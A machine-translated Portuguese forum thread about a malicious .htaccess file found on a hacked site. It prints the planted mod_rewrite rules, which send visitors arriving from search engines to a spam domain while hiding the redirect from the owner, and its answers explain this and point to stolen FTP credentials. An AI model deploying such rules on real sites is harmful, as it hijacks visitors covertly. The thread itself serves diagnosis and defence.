Este foi enviado para uma das minhas pastas de FTP. Não estou familiarizado com o Apache, mas ainda estou curioso - alguém pode me dizer que tipo de ação covarde esse arquivo está tentando cometer? Obrigado!
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
apache-2.2
security
mod-rewrite
.htaccess
ovinófilo
fonte
fonte
.htaccess
arquivo adicionado ao meu site tinha cerca de 40 linhas em branco na parte superior, apenas para me confundir ainda mais.Respostas:
Isso envia os usuários provenientes de um mecanismo de pesquisa para o último site
SPAMMER.info
(consulte o histórico de perguntas do site real ).Ele procura referenciadores na tentativa de se esconder de você , pois você provavelmente não acessa o site pelos mecanismos de pesquisa. Ou seja, se você for diretamente à URL, tudo parecerá normal. No entanto, se você entrar por um mecanismo de pesquisa, será redirecionado.
Nota: isso não afeta os rastreadores da Web, pois eles ( googlebot, pelo menos ) não definem o cabeçalho do referenciador.
fonte
Sempre que um usuário de um mecanismo de pesquisa em qualquer página do seu site, ele será redirecionado para o site de spam .info.
É muito sorrateiro - você não notará que algo está errado, pois normalmente apenas digita o endereço.
fonte
para adicionar mais - provavelmente suas credenciais de ftp vazaram. talvez você os tenha salvado no filezilla / commander total, etc. há muitos malwares que os roubam e depois 'circulam' - fazendo logon em contas ftp, anexando javascript malicioso ao index.php / html ou colocando arquivos reescritos semelhantes.
fonte